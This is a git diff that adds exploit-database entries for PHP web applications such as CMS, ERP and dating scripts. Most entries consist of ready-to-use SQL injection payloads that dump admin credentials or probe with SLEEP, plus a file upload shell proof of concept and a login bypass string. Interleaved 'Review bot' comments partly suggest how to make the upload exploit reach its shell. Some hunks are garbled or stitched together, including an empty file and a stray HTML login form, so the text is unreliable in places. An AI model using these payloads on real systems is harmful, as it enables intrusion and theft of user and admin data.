+# Payload: property_type=&city=(CASE WHEN (9487=9487) THEN SLEEP(5) ELSE 9487 END)&posted_by=
+#
+# Parameter: posted_by (GET)
+# Type: boolean-based blind
+# Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)
+# Payload: property_type=&city=&posted_by=-5550 OR 1335=1335#
+#
+# Type: error-based
+# Title: MySQL OR error-based - WHERE or HAVING clause (FLOOR)
+# Payload: property_type=&city=&posted_by=-9423 OR 1 GROUP BY CONCAT(0x7171787671,(SELECT (CASE WHEN (4134=4134) THEN 1 ELSE 0 END)),0x71766a7071,FLOOR(RAND(0)*2)) HAVING MIN(0)#
+#
+# Type: AND/OR time-based blind
+# Title: MySQL >= 5.0.12 time-based blind - Parameter 
replace
+# Payload: property_type=&city=&posted_by=(CASE WHEN (3754=3754) THEN SLEEP(5) ELSE 3754 END)
+#
+# Parameter: property_type (GET)
+# Type: boolean-based blind
+# Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)
+# Payload: property_type=-8633 OR 6527=6527#&city=&posted_by=
+#
+# Type: error-based
+# Title: MySQL OR error-based - WHERE or HAVING clause (FLOOR)
+# Payload: property_type=-4342 OR 1 GROUP BY CONCAT(0x7171787671,(SELECT (CASE WHEN (3911=3911) THEN 1 ELSE 0 END)),0x71766a7071,FLOOR(RAND(0)*2)) HAVING MIN(0)#&city=&posted_by=
+#
+# Type: AND/OR time-based blind
+# Title: MySQL >= 5.0.12 time-based blind - Parameter replace
+# Payload: property_type=(CASE WHEN (2911=2911) THEN SLEEP(5) ELSE 2911 END)&city=&posted_by=
+#
+# Etc..
+# # # # #
\ No newline at end of file
diff --git a/platforms/php/webapps/43069.txt b/platforms/php/webapps/43069.txt
new file mode 100755
index 000000000..b9bb0fb44
--- /dev/null
+++ b/platforms/php/webapps/43069.txt
@@ -0,0 +1,53 @@
+# # # # #
+# Exploit Title: Php Inventory & Invoice Management System - Arbitrary File Upload
+# Dork: N/A
+# Date: 30.10.2017
+# Vendor Homepage: http://savsofteproducts.com/
+# Software Link: http://www.phpinventory.com/
+# Demo: http://phpinventory.com/phpinventory_demo/
+# Version: N/A
+# Category: Webapps
+# Tested on: WiN7_x64/KaLiLinuX_x64
+# CVE: CVE-2017-15990
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Social: @ihsansencan
+# # # # #
+# Description:
+#
+# The vulnerability allows an users upload arbitrary file....
+#
+# Vulnerable Source:
+#
+# .............1
+# if($_FILES['userfile']['name']!=''){
+# $target = 'images/user_pics/';
+# $targets = $target . basename( $_FILES['userfile']['name']);
+# $docadd=($_FILES['userfile']['name']);
+# if(move_uploaded_file($_FILES['userfile']['tmp_name'], $targets))
+# {
+# $pfilename=$_FILES['userfile']['name'];
+# $filename=time().$pfilename;
+# $new_path=$target.$filename;
+# rename($targets,$new_path);
+# }
+#
+#}else{
+#$filename=$_POST['user_picname'];
+#}
+# .............2,3,4
+# $target = 'images/logo/';
+# $target = 'images/product_images/';
+# $target = 'images/service_providers/';
+# Etc..
+# .............
+#
+# Proof of Concept:
+#
+# http://localhost/[PATH]/index.php/dashboard/edit_myaccountdetail/
+#
+# http://localhost/[PATH]/images/user_pics/[...].php
+#
+# Etc..
+# # # # #
\ No newline at end of file
diff --git a/platforms/php/webapps/43070.txt b/platforms/php/webapps/43070.txt
new file mode 100755
index 000000000..a85ffd732
--- /dev/null
+++ b/platforms/php/webapps/43070.txt
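Review bot: The quoted handler passes `$_FILES['userfile']['name']` through `basename()` only, so nothing restricts the extension, but it then renames the stored file to `time().$pfilename`, which the PoC path `images/user_pics/[...].php` glosses over: to reach the shell the attacker has to recover the server-side timestamp prefix (presumably from wherever the profile picture is later displayed, or by trying a few seconds around the upload time), and the write-up should say how. The other three `$target` directories are listed without their handler code, so it is unclear whether they share the same `rename` step; each should have its own reachable path or be dropped from the claim. A remediation line would help readers who are triaging rather than exploiting: whitelist image extensions and verify the content, derive the stored name randomly instead of from the client-supplied name, and keep the upload directory non-executable or outside the web root. `index.php/dashboard/edit_myaccountdetail/` appears to be an authenticated profile page, so the precondition (any registered user) should be stated.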
@@ -0,0 +1,40 @@
+# # # # #
+# Exploit Title: Online Exam Test Application - SQL Injection
+# Dork: N/A
+# Date: 30.10.2017
+# Vendor Homepage: http://www.phpscriptsmall.com/
+# Software Link: http://www.exclusivescript.com/product/1z2e4672468/php-scripts/online-exam-test-application
+# Demo: http://198.38.86.159/~onlineexamboard/
+# Version: N/A
+# Category: Webapps
+# Tested on: WiN7_x64/KaLiLinuX_x64
+# CVE: CVE-2017-15989
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Social: @ihsansencan
+# # # # #
+# Description:
+# The vulnerability allows an attacker to inject sql commands....
+#
+# Proof of Concept:
+#
+# http://localhost/[PATH]/resources.php?action=category&sort=[SQL]
+#
+# -8++/*!07777UNION*/+/*!07777SELECT*/+0x31,0x32,0x496873616e2053656e63616e,(/*!07777Select*/+export_set(5,@:=0,(/*!07777select*/+count(*)/*!07777from*/(information_schema.columns)where@:=export_set(5,export_set(5,@,/*!07777table_name*/,0x3c6c693e,2),/*!07777column_name*/,0xa3a,2)),@,2))--+-
+#
+# Parameter: sort (GET)
+# Type: boolean-based blind
+# Title: AND boolean-based blind - WHERE or HAVING clause
+# Payload: action=category&sort=8 AND 5525=5525
+#
+# Type: AND/OR time-based blind
+# Title: MySQL >= 5.0.12 AND time-based blind
+# Payload: action=category&sort=8 AND SLEEP(5)
+#
+# Type: UNION query
+# Title: Generic UNION query (NULL) - 4 columns
+# Payload: action=category&sort=8 UNION ALL SELECT NULL,NULL,CONCAT(0x7176707a71,0x77654f6a51797a6c7755546b54574f68467842734c4268517654667a6e584e63634871574f4f454e,0x716b766a71),NULL-- Yhyw
+#
+# Etc..
+# # # # #
\ No newline at end of file
diff --git a/platforms/php/webapps/43071.txt b/platforms/php/webapps/43071.txt
new file mode 100755
index 000000000..eb483acae
--- /dev/null
+++ b/platforms/php/webapps/43071.txt
@@ -0,0 +1,30 @@
+# # # # #
+# Exploit Title: Nice PHP FAQ Script - SQL Injection
+# Dork: N/A
+# Date: 30.10.2017
+# Vendor Homepage: http://www.nicephpscripts.com/
+# Software http://www.nicephpscripts.com/demo_php_script-PHP-FAQ-Script-Knowledgebase-Script.htm
+# Demo: http://www.nicephpscripts.com/scripts/faqscript/
+# Version: N/A
+# Category: Webapps
+# Tested on: WiN7_x64/KaLiLinuX_x64
+# CVE: CVE-2017-15988
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Social: @ihsansencan
+# # # # #
+# Description:
+# The vulnerability allows an attacker to inject sql commands....
+#
+# Proof of Concept:
+#
+# http://localhost/[PATH]/index.php?nice_theme=[SQL]
+#
+# Parameter: nice_theme (GET)
+# Type: boolean-based blind
+# Title: AND boolean-based blind - WHERE or HAVING clause
+# Payload: nice_theme=3 AND 5083=5083
+#
+# Etc..
+# # # # #
\ No newline at end of file
diff --git a/platforms/php/webapps/43072.txt b/platforms/php/webapps/43072.txt
new file mode 100755
index 000000000..c5cd593d3
--- /dev/null
+++ b/platforms/php/webapps/43072.txt
@@ -0,0 +1,49 @@
+# # # # #
+# Exploit Title: Fake Magazine Cover Script - SQL Injection
+# Dork: N/A
+# Date: 30.10.2017
+# Vendor Homepage: http://www.websitescripts.org/
+# Software Link: http://www.websitescripts.org/website-scripts/fake-magazine-cover-script/prod_81.html
+# Demo: http://websitescripts.org/demo/magazinecoverscript/
+# Version: N/A
+# Category: Webapps
+# Tested on: WiN7_x64/KaLiLinuX_x64
+# CVE: CVE-2017-15987
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Social: @ihsansencan
+# # # # #
+# Description:
+# The vulnerability allows an attacker to inject sql commands....
+#
+# Proof of Concept:
+#
+# http://localhost/[PATH]/rate.php?value=[SQL]
+#
+# -1047+/*!00005UniOn*/+/*!00005SelEct*/+CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION()),2--+-
+#
+# http://localhost/[PATH]/content.php?id=[SQL]
+#
+# -237+/*!00005UNION*/+/*!00005SELECT*/+1,2,3,4,5,(Select+export_set(5,@:=0,(select+count(*)from(information_schema.columns)where@:=export_set(5,export_set(5,@,table_name,0x3c6c693e,2),column_name,0xa3a,2)),@,2)),7,8,9,10,11,12,13--+-
+#
+# Parameter: value (GET)
+# Type: boolean-based blind
+# Title: AND boolean-based blind - WHERE or HAVING clause
+# Payload: value=1047 AND 6465=6465
+#
+# Type: AND/OR time-based blind
+# Title: MySQL >= 5.0.12 AND time-based blind
+# Payload: value=1047 AND SLEEP(5)
+#
+# Parameter: id (GET)
+# Type: boolean-based blind
+# Title: AND boolean-based blind - WHERE or HAVING clause
+# Payload: id=237 AND 1343=1343
+#
+# Type: AND/OR time-based blind
+# Title: MySQL >= 5.0.12 AND time-based blind
+# Payload: id=237 AND SLEEP(5)
+#
+# Etc..
+# # # # #
diff --git a/platforms/php/webapps/43073.txt b/platforms/php/webapps/43073.txt
new file mode 100755
index 000000000..c35aec6ef
--- /dev/null
+++ b/platforms/php/webapps/43073.txt
@@ -0,0 +1,29 @@
+ +
+ + + +
diff --git a/platforms/php/webapps/43074.txt b/platforms/php/webapps/43074.txt
new file mode 100755
index 000000000..548f408f3
--- /dev/null
+++ b/platforms/php/webapps/43074.txt
@@ -0,0 +1,44 @@
+# # # # #
+# Exploit Title: Basic B2B Script - SQL Injection
+# Dork: N/A
+# Date: 30.10.2017
+# Vendor Homepage: http://www.phpscriptsmall.com/
+# Software Link: http://www.exclusivescript.com/product/nC3F4570353/php-scripts/basic-b2b-script
+# Demo: http://readymadeb2bscript.com/product/entrepreneur/
+# Version: N/A
+# Category: Webapps
+# Tested on: WiN7_x64/KaLiLinuX_x64
+# CVE: CVE-2017-15985
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Social: @ihsansencan
+# # # # #
+# Description:
+# The vulnerability allows an attacker to inject sql commands....
+#
+# Proof of Concept:
+#
+# http://localhost/[PATH]/product_view1.php?pid=[SQL]
+#
+# -19'++/*!03333UNION*/+/*!03333SELECT*/+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,(/*!03333Select*/+export_set(5,@:=0,(/*!03333select*/+count(*)/*!03333from*/(information_schema.columns)where@:=export_set(5,export_set(5,@,/*!03333table_name*/,0x3c6c693e,2),/*!03333column_name*/,0xa3a,2)),@,2)),18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37--+-
+#
+# http://localhost/[PATH]/productcompanyinfo.php?id=[SQL]
+#
+#
+# Parameter: pid (GET)
+# Type: AND/OR time-based blind
+# Title: MySQL >= 5.0.12 AND time-based blind
+# Payload: pid=19' AND SLEEP(5) AND 'zgOs'='zgOs
+#
+# Parameter: id (GET)
+# Type: boolean-based blind
+# Title: AND boolean-based blind - WHERE or HAVING clause
+# Payload: id=309' AND 2824=2824 AND 'AWCd'='AWCd
+#
+# Type: AND/OR time-based blind
+# Title: MySQL >= 5.0.12 AND time-based blind
+# Payload: id=309' AND SLEEP(5) AND 'BTCw'='BTCw
+#
+# Etc..
+# # # # #
\ No newline at end of file
diff --git a/platforms/php/webapps/43075.txt b/platforms/php/webapps/43075.txt
new file mode 100755
index 000000000..0f9a7d61b
--- /dev/null
+++ b/platforms/php/webapps/43075.txt
@@ -0,0 +1,36 @@
+# # # # #
+# Exploit Title: Creative Management System - CMS Lite 1.4 - SQL Injection
+# Dork: N/A
+# Date: 30.10.2017
+# Vendor Homepage: http://bekirk.co.uk/
+# Software Link: https://codecanyon.net/item/creative-management-system-cms-lite/15297597
+# Demo: http://demo.bekirk.co.uk/
+# Version: 1.4
+# Category: Webapps
+# Tested on: WiN7_x64/KaLiLinuX_x64
+# CVE: CVE-2017-15984
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Social: @ihsansencan
+# # # # #
+# Description:
+# The vulnerability allows an attacker to inject sql commands....
+#
+# Proof of Concept:
+#
+# http://localhost/[PATH]/index.php?S=[SQL]
+#
+# '+/*!50000Procedure*/+/*!50000Analyse*/+(extractvalue(0,/*!50000concat*/(0x27,0x3a,CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION()))),0)--+-
+#
+# Parameter: S (GET)
+# Type: boolean-based blind
+# Title: AND boolean-based blind - WHERE or HAVING clause
+# Payload: S=BeDark' AND 7998=7998 AND 'QNRN'='QNRN
+#
+# Type: AND/OR time-based blind
+# Title: MySQL >= 5.0.12 AND time-based blind
+# Payload: S=BeDark' AND SLEEP(5) AND 'DmYc'='DmYc
+#
+# Etc..
+# # # # #
diff --git a/platforms/php/webapps/43076.txt b/platforms/php/webapps/43076.txt
new file mode 100755
index 000000000..253cef16e
--- /dev/null
+++ b/platforms/php/webapps/43076.txt
@@ -0,0 +1,31 @@
+# # # # #
+# Exploit Title: MyMagazine Magazine & Blog CMS 1.0 - SQL Injection
+# Dork: N/A
+# Date: 30.10.2017
+# Vendor Homepage: http://geniusocean.com/
+# Software Link: https://codecanyon.net/item/mymagazine-bootstrap-newspaper-magazine-and-blog-cms-script/19620468
+# Demo: http://demo.geniusocean.com/mymagazine/
+# Version: 1.0
+# Category: Webapps
+# Tested on: WiN7_x64/KaLiLinuX_x64
+# CVE: CVE-2017-15983
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Social: @ihsansencan
+# # # # #
+# Description:
+# The vulnerability allows an attacker to inject sql commands....
+#
+# Proof of Concept:
+#
+# http://localhost/[PATH]/admin_process.php?act=vdoeditform&id=[SQL]
+#
+# -1'++/*!50000UNION*/+/*!50000SELECT*/+0x31,(/*!08888Select*/+export_set(5,@:=0,(/*!08888select*/+count(*)/*!08888from*/(information_schema.columns)where@:=export_set(5,export_set(5,@,/*!08888table_name*/,0x3c6c693e,2),/*!08888column_name*/,0xa3a,2)),@,2)),VersiON(),0x34,0x35,0x36--+-
+#
+# http://localhost/[PATH]/admin/admin_process.php?act=cateditform&id=[SQL]
+#
+# -1'++/*!00022UNION*/+/*!00022SELECT*/+0x31,/*!00022cOnCat*/(username,0x3a,password),0x33,0x34,0x35+/*!00022From*/+admin--+-
+#
+# Etc..
+# # # # #
\ No newline at end of file
diff --git a/platforms/php/webapps/43077.txt b/platforms/php/webapps/43077.txt
new file mode 100755
index 000000000..3b66b4d86
--- /dev/null
+++ b/platforms/php/webapps/43077.txt
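Review bot: Both PoC URLs target `admin_process.php`, once as `[PATH]/admin_process.php` and once as `[PATH]/admin/admin_process.php` — the two paths disagree and one is probably a typo — and the file never says whether the `act=vdoeditform` and `act=cateditform` handlers are reachable without an admin session; if they require login this is a post-authentication SQL injection and should be rated as such. The second payload dumps `username` and `password` from the `admin` table, which only matters if the endpoint is reachable pre-auth, so a line such as `# Authentication: not required (verified on demo)` or `# Authentication: admin session required` is needed. Nearly the same text and payloads are committed as 43077 and 43078 for sibling products from the same vendor; if they share a code base, saying so once would help maintainers confirm that a single fix covers all three.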
@@ -0,0 +1,31 @@
+# # # # #
+# Exploit Title: News Magazine & Blog CMS 1.0 - SQL Injection
+# Dork: N/A
+# Date: 30.10.2017
+# Vendor Homepage: http://geniusocean.com/
+# Software Link: https://codecanyon.net/item/news-dynamic-newspaper-magazine-and-blog-cms-script/19656143
+# Demo: http://demo.geniusocean.com/news/
+# Version: 1.0
+# Category: Webapps
+# Tested on: WiN7_x64/KaLiLinuX_x64
+# CVE: CVE-2017-15982
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Social: @ihsansencan
+# # # # #
+# Description:
+# The vulnerability allows an attacker to inject sql commands....
+#
+# Proof of Concept:
+#
+# http://localhost/[PATH]/admin_process.php?act=vdoeditform&id=[SQL]
+#
+# -1'++/*!50000UNION*/+/*!50000SELECT*/+0x31,(/*!08888Select*/+export_set(5,@:=0,(/*!08888select*/+count(*)/*!08888from*/(information_schema.columns)where@:=export_set(5,export_set(5,@,/*!08888table_name*/,0x3c6c693e,2),/*!08888column_name*/,0xa3a,2)),@,2)),VersiON(),0x34,0x35,0x36--+-
+#
+# http://localhost/[PATH]/admin/admin_process.php?act=cateditform&id=[SQL]
+#
+# -1'++/*!00022UNION*/+/*!00022SELECT*/+0x31,/*!00022cOnCat*/(username,0x3a,password),0x33,0x34,0x35+/*!00022From*/+admin--+-
+#
+# Etc..
+# # # # #
\ No newline at end of file
diff --git a/platforms/php/webapps/43078.txt b/platforms/php/webapps/43078.txt
new file mode 100755
index 000000000..b73a71bc1
--- /dev/null
+++ b/platforms/php/webapps/43078.txt
@@ -0,0 +1,31 @@
+# # # # #
+# Exploit Title: Newspaper Magazine & Blog CMS 1.0 - SQL Injection
+# Dork: N/A
+# Date: 30.10.2017
+# Vendor Homepage: http://geniusocean.com/
+# Software Link: https://codecanyon.net/item/mymagazine-fully-responsive-magazine-cms/19493325
+# Demo: http://demo.geniusocean.com/newspaper/
+# Version: 1.0
+# Category: Webapps
+# Tested on: WiN7_x64/KaLiLinuX_x64
+# CVE: CVE-2017-15981
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Social: @ihsansencan
+# # # # #
+# Description:
+# The vulnerability allows an attacker to inject sql commands....
+#
+# Proof of Concept:
+#
+# http://localhost/[PATH]/admin/admin_process.php?act=editpollform&id=[SQL]
+#
+# -2'++/*!00022UNION*/+/*!00022SELECT*/+0x31,(/*!08888Select*/+export_set(5,@:=0,(/*!08888select*/+count(*)/*!08888from*/(information_schema.columns)where@:=export_set(5,export_set(5,@,/*!08888table_name*/,0x3c6c693e,2),/*!08888column_name*/,0xa3a,2)),@,2)),0x33,0x34,0x35,VerSiOn(),dAtAbAsE(),0x38,0x39,0x3130,0x3131,0x3132--+-
+#
+# http://localhost/[PATH]/admin/admin_process.php?act=cateditform&id=[SQL]
+#
+# -2'++/*!00022UNION*/+/*!00022SELECT*/+0x31,/*!00022cOnCat*/(username,0x3a,password),0x33,0x34,0x35+/*!00022from*/+admin--+-
+#
+# Etc..
+# # # # #
\ No newline at end of file
diff --git a/platforms/php/webapps/43079.txt b/platforms/php/webapps/43079.txt
new file mode 100755
index 000000000..86b142a21
--- /dev/null
+++ b/platforms/php/webapps/43079.txt
@@ -0,0 +1,32 @@
+# # # # #
+# Exploit Title: US Zip Codes Database Script - SQL Injection
+# Dork: N/A
+# Date: 30.10.2017
+# Vendor Homepage: http://rowindex.com/
+# Software Link: https://www.codester.com/items/4898/us-zip-codes-database-php-script
+# Demo: http://rowindex.com/demo/
+# Version: N/A
+# Category: Webapps
+# Tested on: WiN7_x64/KaLiLinuX_x64
+# CVE: CVE-2017-15980
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Social: @ihsansencan
+# # # # #
+# Description:
+# The vulnerability allows an attacker to inject sql commands....
+#
+# Proof of Concept:
+#
+# http://localhost/[PATH]/index.php?action=lookup-county&state=[SQL]
+#
+# 11'+/*!08888UniOn*/+/*!08888Select*/+(/*!08888Select*/+export_set(5,@:=0,(/*!08888select*/+count(*)/*!08888from*/(information_schema.columns)where@:=export_set(5,export_set(5,@,/*!08888table_name*/,0x3c6c693e,2),/*!08888column_name*/,0xa3a,2)),@,2))--+-
+#
+# Parameter: state (GET)
+# Type: UNION query
+# Title: Generic UNION query (NULL) - 1 column
+# Payload: action=lookup-county&state=' UNION ALL SELECT CONCAT(0x716a717071,0x766a414e736e79524546725053474f72754d764a4772697a65666a7551464b46435141414d4e616c,0x7170707071)-- hvbM
+#
+# Etc..
+# # # # #
\ No newline at end of file
diff --git a/platforms/php/webapps/43080.txt b/platforms/php/webapps/43080.txt
new file mode 100755
index 000000000..18dff5b48
--- /dev/null
+++ b/platforms/php/webapps/43080.txt
@@ -0,0 +1,30 @@
+# # # # #
+# Exploit Title: Shareet - Photo Sharing Social Network - SQL Injection
+# Dork: N/A
+# Date: 30.10.2017
+# Vendor Homepage: https://odallated.com/
+# Software Link: https://www.codester.com/items/4910/shareet-photo-sharing-social-network
+# Demo: https://odallated.com/shareet/demo/
+# Version: N/A
+# Category: Webapps
+# Tested on: WiN7_x64/KaLiLinuX_x64
+# CVE: CVE-2017-15979
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Social: @ihsansencan
+# # # # #
+# Description:
+# The vulnerability allows an attacker to inject sql commands....
+#
+# Proof of Concept:
+#
+# http://localhost/[PATH]/?photo=[SQL]
+#
+# Parameter: photo (GET)
+# Type: AND/OR time-based blind
+# Title: MySQL >= 5.0.12 AND time-based blind
+# Payload: photo=saSihSiRf1E' AND SLEEP(5) AND 'DUqs'='DUqs
+#
+# Etc..
+# # # # #
\ No newline at end of file
diff --git a/platforms/php/webapps/43081.txt b/platforms/php/webapps/43081.txt
new file mode 100755
index 000000000..419e41ef2
--- /dev/null
+++ b/platforms/php/webapps/43081.txt
@@ -0,0 +1,36 @@
+# # # # #
+# Exploit Title: AROX School ERP PHP Script - SQL Injection
+# Dork: N/A
+# Date: 30.10.2017
+# Vendor Homepage: http://arox.in/
+# Software Link: https://www.codester.com/items/4908/arox-school-erp-php-script
+# Demo: http://erp1.arox.in/
+# Version: CVE-2017-15978
+# Category: Webapps
+# Tested on: WiN7_x64/KaLiLinuX_x64
+# CVE: N/A
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Social: @ihsansencan
+# # # # #
+# Description:
+# The vulnerability allows an attacker to inject sql commands....
+#
+# Proof of Concept:
+#
+# http://localhost/[PATH]/office_admin/?pid=95&action=print_charactercertificate&id=[SQL]
+# http://localhost/[PATH]/office_admin/?pid=95&action=edit&id=3[SQL]
+#
+# Parameter: id (GET)
+# Type: AND/OR time-based blind
+# Title: MySQL >= 5.0.12 AND time-based blind
+# Payload: pid=95&action=print_charactercertificate&id=3 AND SLEEP(5)
+#
+# Parameter: id (GET)
+# Type: AND/OR time-based blind
+# Title: MySQL >= 5.0.12 AND time-based blind
+# Payload: pid=95&action=edit&id=3 AND SLEEP(5)
+#
+# Etc..
+# # # # #
diff --git a/platforms/php/webapps/43082.txt b/platforms/php/webapps/43082.txt
new file mode 100755
index 000000000..91573bf80
--- /dev/null
+++ b/platforms/php/webapps/43082.txt
@@ -0,0 +1,46 @@ + +
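Review bot: In 43081.txt the `Version:` and `CVE:` header values are swapped — the hunk has `# Version: CVE-2017-15978` and `# CVE: N/A`. Every sibling file in this commit keeps the identifier on the `CVE:` line, and anything that cross-references entries by that line will miss this one. It should read `# CVE: CVE-2017-15978`, with the `Version:` line carrying the product version (not stated anywhere in the file) or `N/A`.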
+
+ + + + + + + + + +

Username

+
Password +
+
+ +
diff --git a/platforms/php/webapps/43083.txt b/platforms/php/webapps/43083.txt
new file mode 100755
index 000000000..b9fd9d8a5
--- /dev/null
+++ b/platforms/php/webapps/43083.txt
@@ -0,0 +1,40 @@
+# # # # #
+# Exploit Title: ZeeBuddy 2x - SQL Injection
+# Dork: N/A
+# Date: 30.10.2017
+# Vendor Homepage: http://www.zeescripts.com/
+# Software Link: http://www.zeebuddy.com/
+# Demo: http://www.zeebuddy.com/demo/
+# Version: 2x
+# Category: Webapps
+# Tested on: WiN7_x64/KaLiLinuX_x64
+# CVE: CVE-2017-15976
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Social: @ihsansencan
+# # # # #
+# Description:
+# The vulnerability allows an attacker to inject sql commands....
+#
+# Proof of Concept:
+#
+# http://localhost/[PATH]/admin/editadgroup.php?groupid=[SQL]
+#
+# -1++/*!00009UNION*/+/*!00009SELECT*/+0x31,0x32,0x33,0x34,0x35,0x36,0x37,0x38,(SELECT+GROUP_CONCAT(0x557365726e616d653a,name,0x3c62723e,0x50617373776f72643a,pwd+SEPARATOR+0x3c62723e)+FROM+admin)--+-
+#
+# Parameter: groupid (GET)
+# Type: boolean-based blind
+# Title: AND boolean-based blind - WHERE or HAVING clause
+# Payload: groupid=1 AND 3188=3188
+#
+# Type: AND/OR time-based blind
+# Title: MySQL >= 5.0.12 AND time-based blind
+# Payload: groupid=1 AND SLEEP(5)
+#
+# Type: UNION query
+# Title: Generic UNION query (NULL) - 9 columns
+# Payload: groupid=1 UNION ALL SELECT CONCAT(0x71707a7071,0x754642515970647855775a494a486368477a6e45755355495050634270466969495966676b78536c,0x7162767071),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- oMUM
+#
+# Etc..
+# # # # #
\ No newline at end of file
diff --git a/platforms/php/webapps/43084.txt b/platforms/php/webapps/43084.txt
new file mode 100755
index 000000000..6f19c8fe4
--- /dev/null
+++ b/platforms/php/webapps/43084.txt
@@ -0,0 +1,34 @@
+# # # # #
+# Exploit Title: Vastal I-Tech Dating Zone 0.9.9 - 'product_id' Parameter SQL Injection
+# Dork: N/A
+# Date: 30.10.2017
+# Vendor Homepage: http://vastal.com/
+# Software http://vastal.com/dating-zone-the-dating-software.html
+# Demo: http://datingzone.vastal.com/demo/
+# Version: 0.9.9
+# Category: Webapps
+# Tested on: WiN7_x64/KaLiLinuX_x64
+# CVE: CVE-2017-15975
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Social: @ihsansencan
+# # # # #
+# Description:
+# The vulnerability allows an attacker to inject sql commands....
+#
+# Proof of Concept:
+#
+# http://localhost/[PATH]/add_to_cart.php?product_id=[SQL]
+#
+# Parameter: product_id (GET)
+# Type: error-based
+# Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
+# Payload: product_id=3 AND (SELECT 5917 FROM(SELECT COUNT(*),CONCAT(0x7176626a71,(SELECT (ELT(5917=5917,1))),0x71716b7171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)
+#
+# Type: AND/OR time-based blind
+# Title: MySQL >= 5.0.12 AND time-based blind
+# Payload: product_id=3 AND SLEEP(5)
+#
+# Etc..
+# # # # #
\ No newline at end of file
diff --git a/platforms/php/webapps/43085.txt b/platforms/php/webapps/43085.txt
new file mode 100755
index 000000000..b1df8d8a1
--- /dev/null
+++ b/platforms/php/webapps/43085.txt
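Review bot: The `Software` header line in 43084.txt drops the `Link:` label that every other file in this commit uses, and the same omission appears in 43086.txt and 43095.txt. Anyone parsing these headers by key will not find a `Software Link` entry for those three files. Proposed for this one: `# Software Link: http://vastal.com/dating-zone-the-dating-software.html`.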
@@ -0,0 +1,28 @@
+# # # # #
+# Exploit Title: tPanel 2009 - Authentication Bypass
+# Dork: N/A
+# Date: 30.10.2017
+# Vendor Homepage: http://www.datacomponents.net/
+# Software Link: http://www.datacomponents.net/products/hosting/tpanel/
+# Demo: http://demo.datacomponents.net/tpanel/
+# Version: 2009
+# Category: Webapps
+# Tested on: WiN7_x64/KaLiLinuX_x64
+# CVE: CVE-2017-15974
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Social: @ihsansencan
+# # # # #
+# Description:
+# The vulnerability allows an attacker to inject sql commands....
+#
+# Proof of Concept:
+#
+#
+# http://localhost/[PATH]/login.php
+#
+# User: 'or 1=1 or ''=' Pass: anything
+#
+# Etc..
+# # # # #
\ No newline at end of file
diff --git a/platforms/php/webapps/43086.txt b/platforms/php/webapps/43086.txt
new file mode 100755
index 000000000..f7a68f786
--- /dev/null
+++ b/platforms/php/webapps/43086.txt
@@ -0,0 +1,44 @@
+# # # # #
+# Exploit Title: Sokial Social Network Script 1.0 - SQL Injection
+# Dork: N/A
+# Date: 30.10.2017
+# Vendor Homepage: http://www.sokial.net/
+# Software http://www.sokial.net/demonstrations-social-network.sk
+# Demo: http://demo.sokial.net/
+# Version: 1.0
+# Category: Webapps
+# Tested on: WiN7_x64/KaLiLinuX_x64
+# CVE: CVE-2017-15973
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Social: @ihsansencan
+# # # # #
+# Description:
+# The vulnerability allows an attacker to inject sql commands....
+#
+# Proof of Concept:
+#
+# http://localhost/[PATH]/admin/members_view.php?id=[SQL]
+#
+# 2271+aND(/*!00033SelEcT*/+0x30783331+/*!00033frOM*/+(/*!00033SelEcT*/+cOUNT(*),/*!00033cOnCaT*/((/*!00033sELECT*/(/*!00033sELECT*/+/*!00033cOnCaT*/(cAST(dATABASE()+aS+/*!00033cHAR*/),0x7e,0x496873616E53656e63616e))+/*!00033FRoM*/+iNFORMATION_sCHEMA.tABLES+/*!00033wHERE*/+tABLE_sCHEMA=dATABASE()+lIMIT+0,1),fLOOR(/*!00033rAND*/(0)*2))x+/*!00033FRoM*/+iNFORMATION_sCHEMA.tABLES+gROUP+bY+x)a)+/*!00033aNd*/+1=1
+#
+# Parameter: id (GET)
+# Type: boolean-based blind
+# Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
+# Payload: id=2271 RLIKE (SELECT (CASE WHEN (8371=8371) THEN 2271 ELSE 0x28 END))
+#
+# Type: error-based
+# Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
+# Payload: id=2271 AND (SELECT 9357 FROM(SELECT COUNT(*),CONCAT(0x7176716a71,(SELECT (ELT(9357=9357,1))),0x717a6b6b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)
+#
+# Type: stacked queries
+# Title: MySQL > 5.0.11 stacked queries (comment)
+# Payload: id=2271;SELECT SLEEP(5)#
+#
+# Type: AND/OR time-based blind
+# Title: MySQL >= 5.0.12 OR time-based blind
